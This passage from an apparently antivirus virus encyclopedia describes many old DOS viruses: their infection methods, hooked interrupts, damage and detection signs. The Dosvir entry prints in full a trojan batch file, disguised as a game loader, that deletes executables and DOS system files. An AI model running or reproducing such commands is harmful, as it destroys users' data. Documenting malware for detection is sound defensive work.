  10480. 1) Hooks INT 21H (AH=4Bh) to infect files.
  10481. 2) Hangs INT 24h to prevent divulging its trace when writing, then
  10482.     checks whether the program to be executed is an uninfected COM
  10483.     file (length must be between 0400h and FA00h bytes). If it is,
  10484.     the virus infects it. Lastly, the virus restores INT 24h.
  10485. 3)  Date and time fields of infected files are not changed.
  10486.  
  10487. Detection Method:
  10488. 1) Call INT21h (AH=2Dh,CH=FFh,DH=FFh) to return the value of AH. If
  10489.     AH=00h, the memory is infected. If AH=FFh, the memory is not
  10490.     infected.
  10491. 2) If the word at address 0002 of the COM file is 5944h, the memory
  10492.     is infected. After the virus code has been decoded, there will
  10493.     be a text in 01E6h-01EFh that reads:
  10494.  
  10495.        " The Silence Of The Lamb!$"
  10496.  
  10497. 3) Total memory decreases by 1568 bytes.
  10498.  
  10499. [USSR]
  10500. Virus Name: USSR
  10501. Other Names: 570, 8-17-88, 2:08a
  10502. Virus Type: Parasitic Virus
  10503. Virus Length: 570 bytes
  10504.  
  10505. Symptom:
  10506. 1) Infects .EXE files. Increases file size by 570 to 585 (570+15) bytes.
  10507.    (The next multiple of 16 of the original file size plus 570).
  10508. 2) The date and time fields in the file's directory entry is set to
  10509.    8-17-88 and 2:08a.
  10510.  
  10511. Damage: Writes one sector to the boot sector of the C drive, then halts
  10512. the system.
  10513.  
  10514. [Vacsina-V16h]
  10515. Virus Name: Vacsina V16h
  10516. Other Names: Virus 1339
  10517. Virus Type: Parasitic Virus, RAM resident
  10518. Virus Length: Approximately 1339 bytes
  10519.  
  10520. Execution Procedure:
  10521. 1) Checks whether it is memory resident. If not, it loads itself
  10522.     resident in the memory by hooking INT 21h.
  10523. 2) It then executes the original file.
  10524. 3) While memory resident, the virus infects any uninfected file that
  10525.     is executed.
  10526.  
  10527. Damage: The virus modifies the Ping-Pong virus in the memory. The virus
  10528. changes two bytes, jumps, and adds one subroutine. It is interesting
  10529. that the Ping-Pong virus is ready to change in this manner. After 255
  10530. reboots, the infected disk is deactivated in the memory, returning the
  10531. original interrupt vector to 13h with the value of 0:413h. The virus
  10532. proceeds to play the "Yankee Doodle" song.
  10533.  
  10534. Note: Loads itself resident in the memory. An error message appears if
  10535. there is an I/O error (such as write protect).
  10536.  
  10537. [VCL-2-B]
  10538. Virus Name: Vcl-2-B
  10539. Virus Type: File Virus (infects .COM files)
  10540. Virus Length: 663 Bytes(COM)
  10541. PC Vectors Hooked: None
  10542.  
  10543. Execution Procedure:
  10544. 1) Searches for a .COM file in the current directory.
  10545. 2) Once it locates a file it checks whether it has been infected by
  10546.     VCL-2. If it has, it continues to look for any uninfected .COM file.
  10547. 3) It only infects two files at a time.
  10548.  
  10549. Damage: None
  10550.  
  10551. Detection Method:
  10552. 1) Infected files increase by 663 Bytes.
  10553.  
  10554. Note:
  10555. 1) Doesn't stay resident in the memory.
  10556. 2) Doesn't hook INT 24h when infecting files. Error message appears if
  10557.     there is an I/O error (such as write protect).
  10558.  
  10559. [Violator]
  10560. Virus Name: Violator
  10561. Other Names: Violator Strain B, Violator BT
  10562. Virus Type: File Virus
  10563. Virus Length: 1055 bytes (COM files)
  10564.  
  10565. Execution Procedure:
  10566. 1) Checks whether it is memory resident. If not, it loads itself
  10567.    resident in the memory by hooking INT 21h.
  10568. 2) It then executes the original file.
  10569. 3) While memory resident the virus infects any uninfected file that
  10570.    is executed. Doesn't infect .EXE files.
  10571.  
  10572. Damage: If the system date is after Aug 15, 1990, the virus will format
  10573. the first cylinder of the current drive.
  10574.  
  10575. Detection Method:
  10576. 1) Infected .COM files increase by 1055 bytes.
  10577.  
  10578. Note:
  10579. 1) Loads itself resident in the memory.
  10580. 2) An error message appears if there is an I/O error (such as write
  10581.    protect).
  10582.  
  10583. [Virus 9]
  10584. Virus Name: Virus9
  10585. Virus Type: File Virus (infects .COM files)
  10586. Virus Length: 256 Bytes (COM files)
  10587.  
  10588. PC Vectors Hooked: None
  10589.  
  10590. Execution Procedure:
  10591. 1) Searches for a .COM file in the current directory.
  10592. 2) It infects all uninfected files until all files in the current and
  10593.    the "mother" directories are infected.
  10594.  
  10595. Damage: None
  10596.  
  10597. Detection Method: Infected files increase by 256 Bytes.
  10598.  
  10599. Note:
  10600. 1) Doesn't stay resident in the memory.
  10601. 2) Doesn't hook INT 24h when infecting files. Error message appears
  10602.    if there is an I/O error (such as write protect).
  10603. 3) The virus does not reinfect.
  10604.  
  10605.  
  10606. [Winword.Nuclear]
  10607. Virus Name: Winword.Nuclear
  10608. Virus Type: File Virus
  10609. Virus Length: N/A
  10610.  
  10611. Description: This virus infects MSWORD documents.
  10612. When an infected document is opened, the virus goes resident by
  10613. adding some macros to your WORD environment. The virus also runs a
  10614. macro called PayLoad which wipes out your DOS system files on the 5th
  10615. of April.
  10616.  
  10617. Once the virus is active, all documents saved using the "Save As..."
  10618. command will be infected. Occasionally, printed documents will have
  10619. the following two lines of text added:
  10620.  
  10621.   "And finally I would like to say:
  10622.    STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC"
  10623.  
  10624. The virus may also try to inject a DOS file virus "Ph33r" into your
  10625. system.
  10626.  
  10627. [Wit Code]
  10628. Virus Name: WITCODE
  10629. Other names: None
  10630. Virus Type: File Virus
  10631. Virus Length: 965/975 bytes
  10632. PC Vectors Hooked: INT 21h
  10633.  
  10634. Execution Procedure:
  10635. 1) Checks whether it is memory resident. If not, it loads itself
  10636.     resident in the memory by hooking INT 21h.
  10637. 2) It then executes the original file.
  10638. 3) Once memory resident it infects any uninfected file that is
  10639.     executed.
  10640.  
  10641. Damage: None
  10642.  
  10643. Detection Method: Increases infected file size by 965/975 bytes
  10644.  
  10645. Note:
  10646. 1) Loads itself resident in the memory.
  10647. 2) An error message appears if there is an I/O error (such as write
  10648.     protect).
  10649.  
  10650.  
  10651. [XQR-B]
  10652. Virus Name: XQR-B
  10653. Virus Type: File Virus (infects .COM and .EXE files) and
  10654.             Partition Table Infector
  10655. Virus Length: No change
  10656. PC Vectors Hooked: INT 21h, INT 24h, INT 13h, INT 8h
  10657.  
  10658. Execution Procedure:
  10659. 1) When you execute an infected file, the virus infects Sector #1.
  10660. 2) Checks whether it is memory resident. If not, it loads itself
  10661.     resident in the memory by hooking INT 21h, INT 8h, and INT 13h.
  10662. 3) If the system date is May 4, the virus displays this message:
  10663.  
  10664.    " XQR: Wherever, I love you Forever and ever! The beautiful memory
  10665.    for ours in that summer time has been recorded in Computer history .
  10666.    Bon voyage, My dear XQR! "
  10667.  
  10668. 4) Infects every uninfected file that is executed.
  10669.  
  10670. Damage: The virus changes the keyboard configuration every Sunday.
  10671.  
  10672. Detection Method: Check whether or not the keyboard is working
  10673. properly.
  10674.  
  10675. Note:
  10676. 1) Hooks INT 24h when infecting files. It omits I/O errors (such as
  10677.     write protect).
  10678.  
  10679. [Yonyu]
  10680. Virus Name: YONYU
  10681. Virus Type: Boot Sector and Partition Infector
  10682. Virus Length: None.
  10683. PC Vectors Hooked: INT 13h
  10684.  
  10685. Execution Procedure:
  10686. 1) The virus decreases, by 1K bytes, the total memory when the system
  10687.     is booted from an infected disk.
  10688. 2) It loads itself resident into the last 1K bytes of the memory.
  10689. 3) Hooks INT 13h.
  10690. 4) Infects the diskette.
  10691.  
  10692. Damage: None
  10693.  
  10694. Detection Method: Decreases total memory by 1K Bytes.
  10695.  
  10696. Note:
  10697. 1) Doesn't hook INT 24h when infecting files. It omits I/O errors
  10698.     (such as write protect).
  10699.  
  10700.  
  10701. [Gorlovka]
  10702. Virus Name: Gorlovka
  10703. Virus Type: Memory resident, File Virus (COM and EXE files)
  10704. Virus Length:
  10705. PC Vectors Hooked: INT 21h, INT 24h
  10706.  
  10707. Execution Procedure:
  10708. 1) Checks whether it resides in the memory. If it is, the virus
  10709.     displays the following message: "Tracing mode has been destroyed."
  10710.     Otherwise, it loads itself resident in the high memory.
  10711. 2) Hooks INT 21h and then displays: "Tracing mode has been destroyed."
  10712.  
  10713. Infection Procedure: Hooks INT 21H(AH=4Bh). First, it will hang INT
  10714. 24h to prevent divulging its trace when writing, then checks
  10715. whether the program to be executed is an uninfected COM or EXE
  10716. file. If it is, the virus proceeds to infect it. Lastly, the virus
  10717. restores INT 24h.
  10718.  
  10719. Damage: The virus overwrites the original files with the virus code,
  10720. thus corrupting them.
  10721.  
  10722. Note: Infected file sizes are not changed.
  10723.  
  10724. Detection Method: Check for the above message.
  10725.  
  10726. [Akuku-649]
  10727. Virus Name: Akuku-649
  10728. Virus Type: File Virus (COM files)
  10729. Virus Length: 649 bytes
  10730.  
  10731. Execution Procedure:
  10732. 1) Searches for all uninfected COM files on the current directory
  10733.     (it does not infect the same file twice) and then proceeds to
  10734.     infect them.
  10735. 2) No matter whether it has infected files or not, it will check
  10736.     whether the current calendar year is greater than 1994, the
  10737.     current month is greater than 6, the current day is greater
  10738.     than 6, and the current time is after 15:00. If all these
  10739.     conditions are met, the virus displays the following message:
  10740.  
  10741.           "A kuku frajerze."
  10742.  
  10743. Damage: None
  10744.  
  10745. Note:
  10746. 1) Does not stay in the memory.
  10747. 2) Before infecting files, it will hang INT 24h to prevent
  10748.     divulging its trace when writing.
  10749.  
  10750. Detection Method: Infected files increase by 649 bytes.
  10751.  
  10752. [Cossiga]
  10753. Virus Name: Cossiga
  10754. Virus Type: File Virus (EXE files)
  10755. Virus Length:
  10756.  
  10757. Execution Procedure:
  10758. 1) Searches for an uninfected EXE file on the current directory, and
  10759.    then infects it (only infects one file at a time).
  10760. 2) No matter whether it has infected files or not, it will check
  10761.    whether the current date is after 10/17/1991. If it is, the virus
  10762.    displays the following message:
  10763.  
  10764.     "COSSIGA ?! NO GRAZZIE ! By Amissi dee Panoce (c) 1991 "
  10765.  
  10766. Damage: It overwrites the original files with the virus code, thus
  10767. corrupting the files.
  10768.  
  10769. Note:
  10770. 1) Does not stay in the memory.
  10771. 2) An error message appears when writing because INT 24h has
  10772.    not been hanged.
  10773.  
  10774. [DOS Vir]
  10775. Virus Name: Dosvir
  10776. Virus Type: TROJAN
  10777. Virus Length: 3004 bytes
  10778.  
  10779. Execution Procedure:
  10780. 1) The virus creates a batch file with the following commands:
  10781.         CLS
  10782.         echo Cracked by Cracking Kr .e 20 2
  10783.         echo Loading game.  .Please Wait....
  10784.         c:
  10785.         CD\
  10786.         DEL autoexec.bat
  10787.         DEL *.exe
  10788.         DEL *.com
  10789.         DEL *.exe
  10790.         DEL *.com
  10791.         DEL *.sys
  10792.         ATTRIB..-r ibmbio.com
  10793.         ATTRIB..-r ibmdos.com
  10794.         ATTRIB..-r ibmbio.sys
  10795.         ATTRIB..-r ibmdos.sys
  10796.         DEL ibmbio.com
  10797.         DEL ibmdos.com
  10798.         DEL ibmbio.sys
  10799.         DEL ibmdos.sys
  10800.         CD\bbs
  10801.         DEL *.exe
  10802.         DEL *.com
  10803.         CD\dos
  10804.         DEL *.exe
  10805.         DEL *.com
  10806.         d:
  10807.         CD\
  10808.         DEL autoexec.bat
  10809.         DEL *.exe
  10810.         DEL *.com
  10811.         CD\dos
  10812.         DEL *.exe
  10813.         DEL *.com
  10814.         CD\bbs
  10815.         DEL *.exe
  10816.         DEL *.com
  10817.         CLS
  10818. 2) Executes the batch file.
  10819.  
  10820. [Deranged]
  10821. Virus Name: Deranged
  10822. Virus Type: File Virus (EXE files)
  10823. Virus Length: 419 bytes
  10824.  
  10825. Execution Procedure:
  10826. 1) Searches for all uninfected EXE files on the current directory, and
  10827.    then proceeds to infect them.
  10828.  
  10829. Damage: None
  10830.  
  10831. Note:
  10832. 1) Because the virus procedure is not well written, the system halts
  10833.    when an infected file is executed.
  10834. 2) Does not stay in the memory.
  10835. 3) An error message appears when writing because INT 24h has
  10836.    not been hanged.
  10837.  
  10838. Detection method: Infected files increase by 419 bytes.
  10839.  
  10840. [James]
  10841. Virus Name: James
  10842. Virus Type: File Virus (COM files)
  10843. Virus Length: 356 bytes
  10844.  
  10845. PC Vectors Hooked: INT 21h, INT 24h
  10846.  
  10847. Execution Procedure:
  10848. 1) Checks whether it is memory resident. If not, it loads itself
  10849.    resident in the high memory.
  10850. 2) Hooks INT 21h and goes back to original routine.
  10851.  
  10852. Infection Procedure: Hooks INT 21H (AH=4Bh) to infect files. First,
  10853. it hangs INT 24h to prevent divulging its trace when writing,
  10854. then checks whether the program to be executed is an uninfected
  10855. COM file. If it is, the virus proceeds to infect it. Lastly, the
  10856. virus restores INT 24h.
  10857.  
  10858. Damage: None
  10859.  
  10860. Detection method: Infected files increase by 356 bytes.
  10861.  
  10862. [Abraxas-3]
  10863. Virus Name: Abraxas-3
  10864. Virus Type: File Virus (EXE files)
  10865. Virus Length: 1200 bytes
  10866.  
  10867. Execution Procedure:
  10868. 1) The virus plays the song "Do Re Mi Fa So La Si Do Re......".
  10869. 2) Displays the message:
  10870.  
  10871.        "abraxas"
  10872.  
  10873.     in enlarged font.
  10874. 3) Searches for an uninfected EXE file on the current directory and
  10875.     proceeds to infect it (only infects one file at a time). The method
  10876.     of infection is: it creates a file with the same name as the
  10877.     original file, and its length is 1200 bytes.
  10878.  
  10879. Damage: The virus overwrites the original files with the virus code,
  10880. thus corrupting them.
  10881.  
  10882. Detection Method: Infected file length is 1200 bytes.
  10883.  
  10884. [Wolfman]
  10885. Virus Name: Wolf-Man
  10886. Virus Type: Memory Resident, File Virus (COM and EXE files)
  10887. Virus Length: 2064 bytes
  10888. PC Vectors Hooked: INT 09h, INT 10h, INT 16h, INT 21h
  10889.  
  10890. Execution Procedure:
  10891. 1) Checks whether it remains resident in the memory. If not, it loads
  10892.     itself resident into the memory.
  10893. 2) Checks whether the current calendar day is 15. If it is, the virus
  10894.     will manifest itself. Otherwise, it will hook INT 09H, INT 10H,
  10895.     INT 16H, and INT 21H, then it will go back to the original
  10896.     routine.
  10897.  
  10898. Infection Procedure:
  10899. 1) Hooks INT 21H to infect files. It checks whether the program to be
  10900.     executed is an infectable file (except COMMAND.COM), and then
  10901.     proceeds to infect it (the infectable file length must be larger
  10902.     than 1400 bytes).
  10903. 2) Hooks INT 9h and INT 10h to check for a change in the program. If
  10904.     there is, the virus will manifest itself.
  10905.  
  10906. Symptoms: Displays a message. Overwrites the current diskette with
  10907. the virus code until there is no more free space left. Delays 30
  10908. seconds and then proceeds to reboot the system.
  10909.  
  10910. Damage: Destroys all data on the current diskette.
  10911.  
  10912. Note:
  10913. 1) Procedure for displaying the virus message is designed for the
  10914.     Herc display card. Therefore, the system will halt if the virus
  10915.     is run on a color display card. This, in turn, can prevent
  10916.     destruction of the hard disk.
  10917. 2) Virus procedure contains the text : "WOLFMAN"
  10918.  
  10919. Detection Method:
  10920. 1) Infected files increase by 143 bytes.
  10921. 2) Use MEM.EXE to check whether an executed program remains resident
  10922.     in the memory (it will occupy approximately 65.6K bytes).
  10923.  
  10924. [Cuban]
  10925. Virus Name: Cuban
  10926. Virus Type: File Virus (COM files)
  10927. Virus Length: 1501 bytes
  10928. PC Vectors Hooked: INT 21h, INT 24h
  10929.  
  10930. Execution Procedure:
  10931. 1) Checks whether it is memory resident. If not, it loads itself
  10932.     resident in the high memory.
  10933. 2) Hooks INT 21h and goes back to original routine.
  10934. 3) Checks whether the current calendar day is 30. If it is, the virus
  10935.     proceeds to destroy all data on the hard disk.
  10936.  
  10937. Infection Procedure:
  10938. 1) Hooks INT 21H (AH=4Bh) to infect files. First, it hangs
  10939.     INT 24h to prevent divulging its trace when writing. If the
  10940.     program to be executed is an uninfected COM file, the virus
  10941.     infects it directly. If the program to be executed is an EXE
  10942.     file, it will search for an unfixed COM file and infect this COM
  10943.     file.
  10944. 2) Restores INT 24h.
  10945.  
  10946. Damage: The virus sometimes destroys all data on the hard disk.
  10947.  
  10948. Detection Method: Infected files increase by 1501 bytes.
  10949.  
  10950. [Darkend]
  10951. Virus Name: Darkend
  10952. Virus Type: File Virus (EXE files)
  10953. Virus Length: 1188 bytes
  10954. PC Vectors Hooked: INT 21h
  10955.  
  10956. Execution Procedure:
  10957. 1) Checks whether it is memory resident. If not, it loads itself
  10958.     resident in the high memory.
  10959. 2) Hooks INT 21h and goes back to original routine.
  10960. 3) Checks whether the current date is October 15. If it is, the virus
  10961.     destroys all data on the hard disk.
  10962.  
  10963. Infection Procedure:
  10964. 1) Hooks INT 21H (AH=4Bh) to infect files. If the program to be
  10965.     executed is an uninfected EXE file, the virus proceeds to
  10966.     infect it directly.
  10967.  
  10968. Damage: The virus sometimes destroys all data on the hard disk.
  10969.  
  10970. Detection method: Infected files increase by 1188 bytes.
  10971.  
  10972. [Story-A]
  10973. Virus Name: Story-A
  10974. Virus Type: File Virus (COM files)
  10975. Virus Length: 1117 bytes
  10976. PC Vectors Hooked: INT 08h
  10977.  
  10978. Execution Procedure:
  10979. 1) Searches for three (3) uninfected COM files (excluding COMMAND.COM)
  10980.     in the root directory and all subdirectories, and then infects
  10981.     them (does not infect the same file twice).
  10982. 2) Holds the order of every infected file.
  10983. 3) Checks if the order of the current infected file is larger than 7,
  10984.     or if the current date is July 9. If one of these two conditions
  10985.     is met, the virus will activate.
  10986.  
  10987. Symptoms: Does not execute infection procedure, stays resident in
  10988. the memory. Then hooks INT 08h. 290 seconds later, a message appears
  10989. repeatedly (in 22-second cycles) in inverse mode.
  10990.  
  10991. Note: Date and time fields of infected files are not changed.
  10992.  
  10993. Detection Method:
  10994. 1) Memory:
  10995.     a) Total system memory decreases.
  10996.     b) Virus might be triggered if the first 4 bytes of the segment
  10997.         (before free memory) are FFh, 26h, 04h and 01h.
  10998. 2) File:
  10999.     a) Infected files increase by 1117 bytes.
  11000.     b) First 4 bytes of infection are FFh, 26h, 04h and 01h.
  11001.  
  11002. [Story-B]
  11003. Virus Name: Story-B
  11004. Virus Type: File Virus (COM files)
  11005. Virus Length: 1168 bytes
  11006. PC Vectors Hooked: INT 08h
  11007.  
  11008. Execution Procedure:
  11009. 1) Searches for three (3) uninfected COM files (excluding COMMAND.COM)
  11010.     in the root directory and all subdirectories, and then infects them
  11011.     (does not infect the same file twice).
  11012. 2) Holds the order of infected files.
  11013. 3) Checks if the order of the current infected file is larger than 7,
  11014.     or whether the current month is December. If one of these two
  11015.     conditions is met, the virus will activate.
  11016.  
  11017. Symptoms: Does not execute infection procedure, stays resident in the
  11018. memory. Then hooks INT 08h. 290 seconds later, a message appears
  11019. repeatedly (in 22-second cycles) in inverse mode.
  11020.  
  11021. Note: Date and time fields of infected files are not changed.
  11022.  
  11023. Detection method:
  11024. 1) Memory:
  11025.     a) Total system memory decreases.
  11026.     b) Virus might be triggered if the first 4 bytes of the segment
  11027.         (before free memory) are FFh, 26h, 04h and 01h.
  11028. 2) File:
  11029.     a) Infected files increase by 1168 bytes.
  11030.     b) First 4 bytes of infection are FFh, 26h, 04h and 01h.
  11031.  
  11032. [MS DOS 3.0]
  11033. Virus Name: Ms-Dos3.0
  11034. Virus Type: File Virus (COM files)
  11035. Virus Length:  953 bytes
  11036. PC Vectors Hooked: INT 21h
  11037.  
  11038. Execution Procedure:
  11039. 1) Checks whether it is memory resident. If not, it loads itself
  11040.     resident in the high memory.
  11041. 2) Hooks INT 21h and returns to the original routine.
  11042.  
  11043. Infection Procedure:
  11044. 1) Hooks INT 21H (AH=3Dh,AX=4B00h) to infect files. If the program to
  11045.     be executed or opened is an uninfected COM file (except
  11046.     COMMAND.COM) and its length is not larger than FB00h, the virus
  11047.     proceeds to infect it. The method of infection is: it writes a
  11048.     total of 35Dh bytes (1Ch bytes for the head, first 3B9h bytes of
  11049.     the file) at the end of the file, then overwrites its first 3B9h
  11050.     bytes with the virus code. If the program to be executed or opened
  11051.     is an uninfected EXE file and its length is not larger than 4000h,
  11052.     the virus infects it. The method of infection is: after filling the
  11053.     left bytes of the segment, it will attach a total of 3F1h bytes
  11054.     (virus codes(3B9h)+data in original file(1Ch)+head offile(1Ch))
  11055.     at the end of the file, then change the pointer to point to the
  11056.     virus procedure.
  11057.  
  11058. Damage: None
  11059.  
  11060. Note:
  11061. 1) Date and time fields of infected files are not changed.
  11062. 2) Stealth type virus: restores infected file information while the
  11063.     virus is memory resident.
  11064.  
  11065. Detection method:
  11066. 1) Memory:
  11067.     a) Total system memory decreases by 7A0h bytes.
  11068.     b) Memory might be infected if AX=9051h (AX is the returned value
  11069.         when INT 21h(AH=B3h) is called).
  11070. 2) File:
  11071.     a) Infected COM files increase by 500 bytes.
  11072.     b) Infected EXE files increase by 1009-1024 bytes.
  11073.     c) Use DEBUG to load an infected file.
  11074.  
  11075. [Evilgen]
  11076. Virus Name: Evilgen
  11077. Virus Type: File Virus (COM and EXE files)
  11078. Virus Length:  955 bytes (Version 1.1), 963 bytes (Version 2.0)
  11079. PC Vectors Hooked: INT 21h
  11080.  
  11081. Execution Procedure:
  11082. 1) Checks whether it is memory resident. If not, it loads itself
  11083.     resident in the high memory.
  11084. 2) Hooks INT 21h and INT 09h and goes back to the original routine.
  11085. 3) Checks if the current day is 24 and if the "Del" key is depressed.
  11086.     If so, the virus will activate.
  11087.  
  11088. Infection Procedure:
  11089. 1) Hooks INT 21H(AX=4B00h) to infect files. If the program to be
  11090.     executed is an uninfected EXE or COM file, the virus proceeds to
  11091.     infect it.
  11092. 2) Hooks INT 09h to check whether the "Del" key is depressed.
  11093.  
  11094. Symptom: Selects a sector on the C drive, then formats the sector from
  11095. head 0, track 0 to head 0, track 20h.
  11096.  
  11097. Damage: The virus sometimes destroys the C drive.
  11098.  
  11099. Note:
  11100. 1) Date and time fields of infected files are not changed.
  11101. 2) While memory resident, typing " Dir" will not display the change
  11102.     in the sizes of infected files.
  11103.  
  11104. Detection method:
  11105. 1) Memory:
  11106.     a) Total system memory decreases.
  11107.     b) COMMAND.COM on the root directory of C is infected if BX=9051h
  11108.        (BX is the returned value when INT 21h(AX=7BCDh) is called).
  11109.     c) The pointers of INT 21h and INT 09h are the same.
  11110.  
  11111. 2) File:
  11112.     Infected files increase by 955 bytes (Version 1.1) or 963
  11113.     bytes (Version 2.0.). These changes are only apparent if
  11114.     the virus is not memory resident.
  11115.  
  11116. [Decide-2]
  11117. Virus Name: Decide-2
  11118. Virus Type: File Virus (COM files)
  11119. Virus Length: 1335 bytes
  11120.  
  11121. Execution Procedure:
  11122. 1) Searches for an uninfected COM file on the current directory, and
  11123.     then infects it (only infects one file at a time).
  11124. 2) No matter whether it has infected a file or not, it will check
  11125.     whether the current calendar month is September or October, and
  11126.     the current day is between 3 and 18. If it is, the virus displays
  11127.     the following:
  11128.  
  11129.      "As the good times of DECIDE will be remembered, I started to
  11130.      make a new virus. You are not facing the dark tombs of
  11131.      "Morgoth". Humble regards to : Pazuzu, Kingu, Absu Mummu
  11132.      Tiamat, Baxaxaxa Baxaxaxa, Yog Sothoth Iak Sakkath, Kutulu,
  11133.      Humwawa Xaztur, Hubbur Shub Niggurath. Also my lovely regards
  11134.      go to Stephanie, the only one who makes my heart beat
  11135.      stronger. Want to make love with a Moribid Angel? Glenn
  11136.      greets ya. Press a key to start the program..."
  11137.  
  11138. Damage: None
  11139.  
  11140. Note:
  11141. 1) Does not remain in the memory.
  11142. 2) An error message appears when writing because INT 24h has
  11143.     not been hanged.
  11144.  
  11145. Detection method: Infected files increase by 1335 bytes.
  11146.  
  11147. [ED]
  11148. Virus Name: Ed
  11149. Virus Type: File Virus (COM and EXE files)
  11150. Virus Length: 775-785 bytes
  11151. PC Vectors Hooked: INT 21h, INT 24h
  11152.  
  11153. Execution Procedure:
  11154. 1) Checks whether it is memory resident. If not, it loads itself
  11155.     resident in the high memory by hooking INT 21h.
  11156. 2) Hooks INT 21h and goes back to the original routine.
  11157.  
  11158. Infection Procedure:
  11159. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  11160.     prevent divulging its trace when writing. If the program to be
  11161.     executed is an uninfected COM or EXE file, the virus proceeds to
  11162.     infect it.
  11163.  
  11164. Damage: There is a flag in the virus procedure (every infected file
  11165. has a different flag). The flag decreases by 1 every time the virus
  11166. infects a new file. When the flag reaches zero, the virus will
  11167. destroy all data on the hard disk.
  11168.  
  11169. Detection method: Infected files increase by 775-785 bytes.
  11170.  
  11171. [Dima]
  11172. Virus Name: Dima
  11173. Virus Type: File Virus (COM and EXE files)
  11174. Virus Length: 1024 bytes
  11175. PC Vectors Hooked: INT 24h
  11176.  
  11177. Execution Procedure: Searches for all uninfected COM and EXE files
  11178. on all directories, and infects them. Hooks INT 24H to prevent
  11179. divulging its trace when writing.
  11180.  
  11181. Detection method: Infected files increase by 1024 bytes.
  11182.  
  11183. [Digger]
  11184. Virus Name: Digger
  11185. Virus Type: File Virus (COM and EXE files)
  11186. Virus Length:  1472-1482 bytes
  11187.  
  11188. Execution Procedure:
  11189. Searches for an uninfected COM or EXE file on the current directory,
  11190. and then infects it (does not reinfect).
  11191.  
  11192. Damage: None
  11193.  
  11194. Note:
  11195. 1) Does not stay in the memory.
  11196. 2) An error message appears when writing because INT 24h has
  11197.    not been hanged.
  11198.  
  11199. Detection Method: Infected files increase by 1472-1482 bytes.
  11200.  
  11201. [FVHS]
  11202. Virus Name: Fvhs
  11203. Virus Type: File Virus (COM and EXE files)
  11204. Virus Length:
  11205.  
  11206. Execution Procedure:
  11207. Searches for an uninfected COM or EXE file on the current and
  11208. parent directories, then infects it. It infects three files at
  11209. a time.
  11210.  
  11211. Damage: It overwrites the original files with the virus code, thus
  11212. corrupting the files.
  11213.  
  11214. Note:
  11215. 1) Does not stay in the memory.
  11216. 2) An error message appears when writing because INT 24h has
  11217.    not been hanged.
  11218.  
  11219. [Egg]
  11220. Virus Name: Egg
  11221. Virus Type: File Virus (EXE files)
  11222. Virus Length: 1000-1005 bytes
  11223. PC Vectors Hooked: INT 21h, INT 24h
  11224.  
  11225. Execution Procedure:
  11226. 1) Checks whether it is memory resident. If not, it loads itself
  11227.     resident in the high memory.
  11228. 2) Hooks INT 21h and goes back to the original routine.
  11229.  
  11230. Infection Procedure:
  11231. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  11232.     prevent divulging its trace when writing. If the program to be
  11233.     executed is an uninfected EXE file, the virus proceeds to infect
  11234.     it.
  11235.  
  11236. Damage: None
  11237.  
  11238. Detection method: Infected files increase by 1000-1005 bytes.
  11239.  
  11240. [Freddy]
  11241. Virus Name: Freddy
  11242. Virus Type: File Virus (EXE and COM files)
  11243. Virus Length:  1870-1880 bytes
  11244. PC Vectors Hooked: INT 21h
  11245.  
  11246. Execution Procedure:
  11247. 1) Checks whether it is memory resident. If not, it loads itself
  11248.     resident in the high memory.
  11249. 2) Hooks INT 21h and goes back to the original routine.
  11250.  
  11251. Infection Procedure:
  11252. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be
  11253.     executed is an uninfected COM or EXE file, the virus proceeds
  11254.     to infect it. The virus sometimes searches concurrently for
  11255.     other uninfected files to infect.
  11256.  
  11257. Damage: None
  11258.  
  11259. Note: An error message appears when writing because INT 24h has
  11260. not been hanged.
  11261.  
  11262. Detection method: Infected files increase by 1870-1880 bytes.
  11263.  
  11264. [Ninja]
  11265. Virus Name: Ninja
  11266. Virus Type: File Virus (EXE and COM files)
  11267. Virus Length:  1511 or 1466 bytes
  11268.  
  11269. PC Vectors Hooked: INT 21h
  11270.  
  11271. Execution Procedure:
  11272. 1) Checks whether it is memory resident. If not, it loads itself
  11273.    resident in the high memory.
  11274. 2) Hooks INT 21h and goes back to the original routine.
  11275. 3) Checks whether the current calendar year is 1992, current day is 13,
  11276.    and current time is 13:00. If these conditions are met, the virus
  11277.    proceeds to destroy all data on the hard disk.
  11278.  
  11279. Infection Procedure:
  11280. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  11281.    is an uninfected EXE or COM file, the virus infects it.
  11282.  
  11283. Damage: The virus sometimes destroys all data on the hard disk.
  11284.  
  11285. Detection method: Infected files increase by 1511 or 1466 bytes.
  11286.  
  11287. [Yan-2505A]
  11288. Virus Name: Yan2505a
  11289. Virus Type: File Virus (EXE and COM files)
  11290. Virus Length: 2505 bytes
  11291.  
  11292. PC Vectors Hooked: INT 21h, INT 24h
  11293.  
  11294. Execution Procedure:
  11295. 1) Checks whether it is memory resident. If not, it loads itself
  11296.    resident in the high memory.
  11297. 2) Hooks INT 21h and returns to the original routine.
  11298.  
  11299. Infection Procedure:
  11300. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  11301.    prevent divulging its trace when writing. If the program to be
  11302.    executed is an uninfected COM or EXE file, the virus proceeds to
  11303.    infect it.
  11304.  
  11305. Damage: None
  11306.  
  11307. Detection method: Infected files increase by 2505 bytes.
  11308.  
  11309. [Suicide]
  11310. Virus Name: Suicide
  11311. Virus Type: File Virus (COM and EXE files)
  11312. Virus Length: 2048 bytes
  11313.  
  11314. Execution Procedure: Searches for uninfected COM and EXE files on
  11315. the current directory, and then infects them. It infects four files
  11316. at a time.
  11317.  
  11318. Damage: None
  11319.  
  11320. Note:
  11321. 1) Does not stay in the memory.
  11322. 2) An error message appears when writing because INT 24h has not been
  11323.    hanged.
  11324.  
  11325. Detection Method: Infected files increase by 2048 bytes.
  11326.  
  11327. [4915]
  11328. Virus Name: 4915
  11329. Virus Type: File Virus (EXE files)
  11330. Virus Length:
  11331.  
  11332. Execution Procedure: Searches for all uninfected EXE files on
  11333. the current directory in A, and then proceeds to infect them.
  11334.  
  11335. Damage: It overwrites the original files with the virus code, thus
  11336. corrupting the files.
  11337.  
  11338. Note:
  11339. 1) Does not stay in the memory.
  11340. 2) An error message appears when writing because INT 24h has not been
  11341.    hanged.
  11342. 3) This virus was written using an advanced programming language.
  11343.  
  11344. [MSJ]
  11345. Virus Name: Msj
  11346. Virus Type: File Virus (EXE and COM files)
  11347. Virus Length: 15395 bytes
  11348.  
